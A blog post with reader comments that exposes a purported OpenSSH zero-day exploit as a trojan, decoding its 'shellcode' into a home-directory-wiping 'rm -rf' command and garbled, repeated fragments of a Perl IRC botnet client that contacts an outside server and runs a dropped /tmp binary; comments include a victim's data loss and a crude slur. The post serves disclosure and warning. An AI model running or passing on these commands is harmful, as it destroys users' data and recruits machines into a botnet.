Subscribe to the RSS feed in case you are interested in updates
Rumor had it that the anti-sec group was using a OpenSSH 0day, str0ke today linked to an URL that supposedly has the exploit code to that 0day.
The reason the disassembled shellcode looked like crap is that, well , it isn't shellcode, it is nothing else then plain ascii bash/php commands.
Here is that JMP code converted to "assembly" :
00000000 jb 0x6f
00000002 and byte[0x7e206672],ch
00000008 and byte[edi],ch
0000000a sub ah,byte[eax]
0000000c xor bh,byte[esi]
0000000e and byte[edi],ch
00000010 fs: gs: jbe 0x43
00000014 outs dx,byte[esi]
00000015 jne 0x83
00000017 ins byte[es:edi],dx
00000018 and byte[esi],ah
Obviously, this code doesn't make any sense whatsoever, so and here is the JMP code converted from HEX to ASCII :
rm -rf ~ /* 2> /dev/null &
The "shellcode" part actually is :
#!/usr/bin/perl
$chan="#cn";
$ke";
while (<$sockG (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
n";
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="G (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
irc.ham.de.euirc.net";$SIG{TERM}";
while (<$sock";
while (<$sockn";
sleep 1;
n";
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}sleep 1;
sleep 1;
";
while (<$sockn";
sleep 1;
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}d +x /tmp/hi 2>/dev/null;/tmp/hi";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
The supposedly freebsd shellcode is:
";
while (<$sockn";
="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}";
while (<$sock";
while (<$sockn";
sleep 1;
n";
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="sleep 1;
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}d +x /tmp/hi 2>/dev/null;/tmp/hi";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="}}#chmod +x /tmp/hi 2>/dev/null;/tmp/hi
Posts
12 comments:
$key ="fags"
Hahahah!!!
Hahaha, what happened to your leet disassembly of the perl code from before?
I was so excited to see the code and run on my local linux pc and all data lost. I read this only after doing it :-(
This was expected to happen eventually. I wonder how many people will still fall for it though.
I'm on the euirc staff.
We're investigating this resulting botnet and are about to shut it down asap. It would have been nice if we would have been notified earlier however.
@Stefin: PEBKAC
Not only does the shellcode suck and try to rm -rf your system... If you forget about all that and look at the code further down a big hint that it's fake is "int port=23" ... I mean I'm no expert but if its an OpenSSH exploit, I would assume it would say port 22 for SSH not 23 which is usually reserved for Telnet.
DiabloHorn, far too many people will fall for it unfortunately.
Hmm..
Found this out yesterday.
Actually learned a lot about security and backup-strategies at the same time :-/
Same as here: http://blogs.securiteam.com/index.php/archives/1302
juste wondering how did you did to make opocode value => asm ?
using gdb you can make bin =>opocode value
The strange thing is that all ip that try to bruteforce my server are host that run openssh 4.3.
However acording to
http://www.h-online.com/security/OpenSSH-zero-day-exploit-rumours-not-confirmed--/news/113731
OpenSSH zero day exploit rumours not confirmed
Is this disinformation spread deliberately by the hacker group ? the fact is that proving that your url isnt an openssh exploit.
alsao many pepole thinks that astalavista was exposed by openssh bug while a msg in a mailling list show that lightspeed was exploited then a local priv escalation
anti-sec fags forgot to put --no-preserve-root in their code. idiots
Post a Comment